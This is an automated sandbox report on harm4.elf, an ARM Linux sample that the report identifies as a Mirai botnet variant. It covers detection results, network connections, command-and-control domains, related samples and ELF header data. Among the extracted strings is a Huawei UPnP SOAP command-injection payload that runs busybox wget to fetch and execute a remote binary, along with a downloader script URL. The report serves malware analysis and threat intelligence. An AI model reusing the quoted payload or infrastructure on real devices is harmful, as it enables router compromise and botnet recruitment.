Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
harm4.elf

Overview

General Information

Sample name:harm4.elf
Analysis ID:1546612
MD5:b388c33234287df8e67decee3801d046
SHA1:9807602b862a086c0a3ad3042faf88203a322d4d
SHA256:8f925cc077f79f07ad70dbfc9478a1f72a3134f711edebac505914d76dd5af6e
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Detected TCP or UDP traffic on non-standard ports
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1546612
Start date and time:2024-11-01 08:47:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 47s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:harm4.elf
Detection:MAL
Classification:mal80.troj.linELF@0/0@24/0
  • VT rate limit hit for: harm4.elf
Command:/tmp/harm4.elf
PID:5490
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:
  • system is lnxubuntu20
  • harm4.elf (PID: 5490, Parent: 5415, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/harm4.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
harm4.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    harm4.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      5497.1.00007f4d40017000.00007f4d4002e000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        5497.1.00007f4d40017000.00007f4d4002e000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5492.1.00007f4d40017000.00007f4d4002e000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
            5492.1.00007f4d40017000.00007f4d4002e000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              5490.1.00007f4d40017000.00007f4d4002e000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                Click to see the 4 entries
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: harm4.elfAvira: detected
                Source: harm4.elfReversingLabs: Detection: 52%

                Networking

                barindex
                Source: global trafficTCP traffic: 31.13.248.89 ports 5136,1,3,5,6,7427
                Source: global trafficTCP traffic: 91.149.238.18 ports 0,1,3,4,7,10743
                Source: global trafficTCP traffic: 81.29.149.178 ports 7584,18255,1,2,5,8,12035
                Source: global trafficTCP traffic: 192.168.2.14:38570 -> 91.149.238.18:10743
                Source: global trafficTCP traffic: 192.168.2.14:60122 -> 81.29.149.178:18255
                Source: global trafficTCP traffic: 192.168.2.14:41424 -> 217.28.130.41:22500
                Source: global trafficTCP traffic: 192.168.2.14:41106 -> 91.149.218.232:10513
                Source: global trafficTCP traffic: 192.168.2.14:34894 -> 31.13.248.89:5136
                Source: global trafficTCP traffic: 192.168.2.14:54036 -> 213.182.204.57:3207
                Source: /tmp/harm4.elf (PID: 5490)Socket: 127.0.0.1:1172Jump to behavior
                Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
                Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
                Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
                Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
                Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
                Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
                Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
                Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
                Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
                Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
                Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
                Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
                Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
                Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
                Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
                Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
                Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
                Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
                Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
                Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
                Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
                Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
                Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
                Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
                Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
                Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
                Source: harm4.elf, 5497.1.00007f4d40036000.00007f4d4003c000.rw-.sdmpString found in binary or memory: http://hailcocks.ru/wget.sh;
                Source: harm4.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: harm4.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g
                Source: Initial sampleString containing 'busybox' found: -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: classification engineClassification label: mal80.troj.linELF@0/0@24/0

                Persistence and Installation Behavior

                barindex
                Source: /tmp/harm4.elf (PID: 5492)File: /proc/5492/mountsJump to behavior
                Source: /tmp/harm4.elf (PID: 5490)Queries kernel information via 'uname': Jump to behavior
                Source: harm4.elf, 5490.1.00007ffd8a9b7000.00007ffd8a9d8000.rw-.sdmp, harm4.elf, 5492.1.00007ffd8a9b7000.00007ffd8a9d8000.rw-.sdmp, harm4.elf, 5497.1.00007ffd8a9b7000.00007ffd8a9d8000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/harm4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/harm4.elf
                Source: harm4.elf, 5490.1.0000564daea95000.0000564daec0b000.rw-.sdmp, harm4.elf, 5492.1.0000564daea95000.0000564daec0b000.rw-.sdmp, harm4.elf, 5497.1.0000564daea95000.0000564daec0b000.rw-.sdmpBinary or memory string: MV!/etc/qemu-binfmt/arm
                Source: harm4.elf, 5490.1.0000564daea95000.0000564daec0b000.rw-.sdmp, harm4.elf, 5492.1.0000564daea95000.0000564daec0b000.rw-.sdmp, harm4.elf, 5497.1.0000564daea95000.0000564daec0b000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
                Source: harm4.elf, 5490.1.00007ffd8a9b7000.00007ffd8a9d8000.rw-.sdmp, harm4.elf, 5492.1.00007ffd8a9b7000.00007ffd8a9d8000.rw-.sdmp, harm4.elf, 5497.1.00007ffd8a9b7000.00007ffd8a9d8000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
                Source: harm4.elf, 5497.1.00007ffd8a9b7000.00007ffd8a9d8000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: harm4.elf, type: SAMPLE
                Source: Yara matchFile source: 5497.1.00007f4d40017000.00007f4d4002e000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5492.1.00007f4d40017000.00007f4d4002e000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5490.1.00007f4d40017000.00007f4d4002e000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: harm4.elf PID: 5490, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: harm4.elf PID: 5492, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: harm4.elf PID: 5497, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: harm4.elf, type: SAMPLE
                Source: Yara matchFile source: 5497.1.00007f4d40017000.00007f4d4002e000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5492.1.00007f4d40017000.00007f4d4002e000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5490.1.00007f4d40017000.00007f4d4002e000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: harm4.elf PID: 5490, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: harm4.elf PID: 5492, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: harm4.elf PID: 5497, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping11
                Security Software Discovery
                Remote ServicesData from Local System1
                Non-Standard Port
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
                File and Directory Discovery
                Remote Desktop ProtocolData from Removable Media1
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                SourceDetectionScannerLabelLink
                harm4.elf53%ReversingLabsLinux.Trojan.Mirai
                harm4.elf100%AviraEXP/ELF.Mirai.W
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                daisy.ubuntu.com
                162.213.35.25
                truefalse
                  unknown
                  kingstonwikkerink.dyn
                  213.182.204.57
                  truefalse
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://hailcocks.ru/wget.sh;harm4.elf, 5497.1.00007f4d40036000.00007f4d4003c000.rw-.sdmpfalse
                      unknown
                      http://schemas.xmlsoap.org/soap/encoding/harm4.elffalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/soap/envelope/harm4.elffalse
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      217.28.130.41
                      unknownUnited Kingdom
                      15839COBWEB-NETGBfalse
                      213.182.204.57
                      kingstonwikkerink.dynLatvia
                      9009M247GBfalse
                      91.149.218.232
                      unknownPoland
                      198401GECKONET-ASPLfalse
                      31.13.248.89
                      unknownBulgaria
                      34224NETERRA-ASBGtrue
                      91.149.238.18
                      unknownPoland
                      41952MARTON-ASPLtrue
                      81.29.149.178
                      unknownSwitzerland
                      39616COMUNICA_IT_SERVICESCHtrue
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      217.28.130.41harm5.elfGet hashmaliciousUnknownBrowse
                        mips.elfGet hashmaliciousUnknownBrowse
                          arm5.elfGet hashmaliciousUnknownBrowse
                            213.182.204.57harm5.elfGet hashmaliciousUnknownBrowse
                              harm4.elfGet hashmaliciousUnknownBrowse
                                mips.elfGet hashmaliciousUnknownBrowse
                                  arm4.elfGet hashmaliciousUnknownBrowse
                                    x86.elfGet hashmaliciousUnknownBrowse
                                      arm5.elfGet hashmaliciousUnknownBrowse
                                        nshmpsl.elfGet hashmaliciousUnknownBrowse
                                          nsharm.elfGet hashmaliciousUnknownBrowse
                                            nsharm5.elfGet hashmaliciousUnknownBrowse
                                              harm5.elfGet hashmaliciousUnknownBrowse
                                                91.149.218.232harm5.elfGet hashmaliciousUnknownBrowse
                                                  harm4.elfGet hashmaliciousUnknownBrowse
                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                      arm4.elfGet hashmaliciousUnknownBrowse
                                                        arm5.elfGet hashmaliciousUnknownBrowse
                                                          x86.elfGet hashmaliciousMiraiBrowse
                                                            x86.elfGet hashmaliciousUnknownBrowse
                                                              arm5.elfGet hashmaliciousUnknownBrowse
                                                                nsharm7.elfGet hashmaliciousUnknownBrowse
                                                                  nshmpsl.elfGet hashmaliciousUnknownBrowse
                                                                    91.149.238.18harm5.elfGet hashmaliciousUnknownBrowse
                                                                      harm4.elfGet hashmaliciousUnknownBrowse
                                                                        mips.elfGet hashmaliciousUnknownBrowse
                                                                          arm5.elfGet hashmaliciousUnknownBrowse
                                                                            x86.elfGet hashmaliciousMiraiBrowse
                                                                              x86.elfGet hashmaliciousUnknownBrowse
                                                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                                                  nshmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                    nsharm.elfGet hashmaliciousUnknownBrowse
                                                                                      nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                                        31.13.248.89harm5.elfGet hashmaliciousUnknownBrowse
                                                                                          harm4.elfGet hashmaliciousUnknownBrowse
                                                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                                                              arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                  x86.elfGet hashmaliciousMiraiBrowse
                                                                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                                                                      arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                        nsharm.elfGet hashmaliciousUnknownBrowse
                                                                                                          gmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            daisy.ubuntu.comboatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 162.213.35.24
                                                                                                            mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                            • 162.213.35.24
                                                                                                            boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 162.213.35.24
                                                                                                            sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                            • 162.213.35.25
                                                                                                            boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 162.213.35.24
                                                                                                            boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 162.213.35.24
                                                                                                            boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 162.213.35.24
                                                                                                            mips64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                            • 162.213.35.25
                                                                                                            mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                            • 162.213.35.24
                                                                                                            kingstonwikkerink.dynharm5.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 217.28.130.41
                                                                                                            harm4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 31.13.248.89
                                                                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 91.149.218.232
                                                                                                            arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 91.149.218.232
                                                                                                            arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 213.182.204.57
                                                                                                            x86.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 88.151.195.22
                                                                                                            x86.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 195.133.92.51
                                                                                                            arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 185.82.200.181
                                                                                                            nsharm7.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 81.29.149.178
                                                                                                            nshmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 193.233.193.45
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            M247GBg5tO58gHku.exeGet hashmaliciousAsyncRATBrowse
                                                                                                            • 45.74.34.32
                                                                                                            harm5.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 213.182.204.57
                                                                                                            harm4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 213.182.204.57
                                                                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 213.182.204.57
                                                                                                            arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 213.182.204.57
                                                                                                            bxUX6ztvg2.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                            • 45.74.34.32
                                                                                                            nOrden_de_Compra___0001245.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 185.236.203.101
                                                                                                            wZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 38.203.241.135
                                                                                                            8v2IShmMos.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 154.17.76.69
                                                                                                            la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 38.202.225.97
                                                                                                            GECKONET-ASPLharm5.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 91.149.218.232
                                                                                                            harm4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 91.149.218.232
                                                                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 91.149.218.232
                                                                                                            arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 91.149.218.232
                                                                                                            arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 91.149.218.232
                                                                                                            x86.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 91.149.218.232
                                                                                                            x86.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 91.149.218.232
                                                                                                            arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 91.149.218.232
                                                                                                            nsharm7.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 91.149.218.232
                                                                                                            nshmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 91.149.218.232
                                                                                                            COBWEB-NETGBharm5.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 217.28.130.41
                                                                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 217.28.130.41
                                                                                                            arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 217.28.130.41
                                                                                                            UiodpDMy4N.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 217.28.142.8
                                                                                                            miori.armGet hashmaliciousMiraiBrowse
                                                                                                            • 217.28.142.91
                                                                                                            Iw6uyVeTY4Get hashmaliciousMiraiBrowse
                                                                                                            • 217.28.142.95
                                                                                                            x86Get hashmaliciousMiraiBrowse
                                                                                                            • 217.28.142.99
                                                                                                            kEZpozRREFGet hashmaliciousMiraiBrowse
                                                                                                            • 217.28.142.97
                                                                                                            No context
                                                                                                            No context
                                                                                                            No created / dropped files found
                                                                                                            File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                                                                                            Entropy (8bit):6.163249847045424
                                                                                                            TrID:
                                                                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                            File name:harm4.elf
                                                                                                            File size:94'288 bytes
                                                                                                            MD5:b388c33234287df8e67decee3801d046
                                                                                                            SHA1:9807602b862a086c0a3ad3042faf88203a322d4d
                                                                                                            SHA256:8f925cc077f79f07ad70dbfc9478a1f72a3134f711edebac505914d76dd5af6e
                                                                                                            SHA512:278c877eeda0048f9f52c028e3c7056c981ed4bc4d62d243b0c0e23c7e662673afb95c8a8fedbacf9ca11635e34d481800cd1fbb3de48fca90c32bce5f9e88ab
                                                                                                            SSDEEP:1536:ufEqrGbtC4ftpNLg5/qXFNsRam63t5dtc2/NupbdltX8/Y6NFvv4GM:cEqz4fS5hrAt5d7FupbYbzM
                                                                                                            TLSH:2C934B95BC819A12C6D121BBFB6E428D371653E8D2EF3203DE256F20778B86B0E77541
                                                                                                            File Content Preview:.ELF...a..........(.........4....n......4. ...(.....................Xj..Xj..............Xj..Xj..Xj.......U..........Q.td..................................-...L."....R..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                                                                                            ELF header

                                                                                                            Class:ELF32
                                                                                                            Data:2's complement, little endian
                                                                                                            Version:1 (current)
                                                                                                            Machine:ARM
                                                                                                            Version Number:0x1
                                                                                                            Type:EXEC (Executable file)
                                                                                                            OS/ABI:ARM - ABI
                                                                                                            ABI Version:0
                                                                                                            Entry Point Address:0x8190
                                                                                                            Flags:0x202
                                                                                                            ELF Header Size:52
                                                                                                            Program Header Offset:52
                                                                                                            Program Header Size:32
                                                                                                            Number of Program Headers:3
                                                                                                            Section Header Offset:93848
                                                                                                            Section Header Size:40
                                                                                                            Number of Section Headers:11
                                                                                                            Header String Table Index:10
                                                                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                            NULL0x00x00x00x00x0000
                                                                                                            .initPROGBITS0x80940x940x180x00x6AX004
                                                                                                            .textPROGBITS0x80b00xb00x14a700x00x6AX0016
                                                                                                            .finiPROGBITS0x1cb200x14b200x140x00x6AX004
                                                                                                            .rodataPROGBITS0x1cb340x14b340x1f200x00x2A004
                                                                                                            .eh_framePROGBITS0x1ea540x16a540x40x00x2A004
                                                                                                            .ctorsPROGBITS0x26a580x16a580x80x00x3WA004
                                                                                                            .dtorsPROGBITS0x26a600x16a600x80x00x3WA004
                                                                                                            .dataPROGBITS0x26a6c0x16a6c0x3e40x00x3WA004
                                                                                                            .bssNOBITS0x26e500x16e500x51ac0x00x3WA004
                                                                                                            .shstrtabSTRTAB0x00x16e500x480x00x0001
                                                                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                            LOAD0x00x80000x80000x16a580x16a586.18610x5R E0x8000.init .text .fini .rodata .eh_frame
                                                                                                            LOAD0x16a580x26a580x26a580x3f80x55a43.43100x6RW 0x8000.ctors .dtors .data .bss
                                                                                                            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 1, 2024 08:48:03.529385090 CET3857010743192.168.2.1491.149.238.18
                                                                                                            Nov 1, 2024 08:48:03.534315109 CET107433857091.149.238.18192.168.2.14
                                                                                                            Nov 1, 2024 08:48:03.534451962 CET3857010743192.168.2.1491.149.238.18
                                                                                                            Nov 1, 2024 08:48:03.534548998 CET3857010743192.168.2.1491.149.238.18
                                                                                                            Nov 1, 2024 08:48:03.539361000 CET107433857091.149.238.18192.168.2.14
                                                                                                            Nov 1, 2024 08:48:03.539408922 CET3857010743192.168.2.1491.149.238.18
                                                                                                            Nov 1, 2024 08:48:03.544282913 CET107433857091.149.238.18192.168.2.14
                                                                                                            Nov 1, 2024 08:48:04.473639011 CET107433857091.149.238.18192.168.2.14
                                                                                                            Nov 1, 2024 08:48:04.473697901 CET3857010743192.168.2.1491.149.238.18
                                                                                                            Nov 1, 2024 08:48:04.473798037 CET107433857091.149.238.18192.168.2.14
                                                                                                            Nov 1, 2024 08:48:04.473978996 CET3857010743192.168.2.1491.149.238.18
                                                                                                            Nov 1, 2024 08:48:04.474060059 CET107433857091.149.238.18192.168.2.14
                                                                                                            Nov 1, 2024 08:48:04.474109888 CET107433857091.149.238.18192.168.2.14
                                                                                                            Nov 1, 2024 08:48:04.474409103 CET3857010743192.168.2.1491.149.238.18
                                                                                                            Nov 1, 2024 08:48:04.474410057 CET3857010743192.168.2.1491.149.238.18
                                                                                                            Nov 1, 2024 08:48:04.474410057 CET3857010743192.168.2.1491.149.238.18
                                                                                                            Nov 1, 2024 08:48:14.531096935 CET6012218255192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:14.537000895 CET182556012281.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:14.537066936 CET6012218255192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:14.537082911 CET6012218255192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:14.541970968 CET182556012281.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:14.542026043 CET6012218255192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:14.546937943 CET182556012281.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:16.193109989 CET182556012281.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:16.193155050 CET182556012281.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:16.193190098 CET182556012281.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:16.193219900 CET182556012281.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:16.193401098 CET6012218255192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:16.193439007 CET6012218255192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:16.193444967 CET6012218255192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:16.193470001 CET6012218255192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:16.193574905 CET6012218255192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:26.212430000 CET4142422500192.168.2.14217.28.130.41
                                                                                                            Nov 1, 2024 08:48:26.217247009 CET2250041424217.28.130.41192.168.2.14
                                                                                                            Nov 1, 2024 08:48:26.217300892 CET4142422500192.168.2.14217.28.130.41
                                                                                                            Nov 1, 2024 08:48:26.217317104 CET4142422500192.168.2.14217.28.130.41
                                                                                                            Nov 1, 2024 08:48:26.222048998 CET2250041424217.28.130.41192.168.2.14
                                                                                                            Nov 1, 2024 08:48:26.222141981 CET4142422500192.168.2.14217.28.130.41
                                                                                                            Nov 1, 2024 08:48:26.226938963 CET2250041424217.28.130.41192.168.2.14
                                                                                                            Nov 1, 2024 08:48:26.898886919 CET2250041424217.28.130.41192.168.2.14
                                                                                                            Nov 1, 2024 08:48:26.898912907 CET2250041424217.28.130.41192.168.2.14
                                                                                                            Nov 1, 2024 08:48:26.898926973 CET2250041424217.28.130.41192.168.2.14
                                                                                                            Nov 1, 2024 08:48:26.899167061 CET4142422500192.168.2.14217.28.130.41
                                                                                                            Nov 1, 2024 08:48:26.899167061 CET4142422500192.168.2.14217.28.130.41
                                                                                                            Nov 1, 2024 08:48:26.899167061 CET4142422500192.168.2.14217.28.130.41
                                                                                                            Nov 1, 2024 08:48:26.899224043 CET4142422500192.168.2.14217.28.130.41
                                                                                                            Nov 1, 2024 08:48:31.915124893 CET509727584192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:31.920248032 CET75845097281.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:31.920315981 CET509727584192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:31.920372009 CET509727584192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:31.925168991 CET75845097281.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:31.925247908 CET509727584192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:31.930043936 CET75845097281.29.149.178192.168.2.14
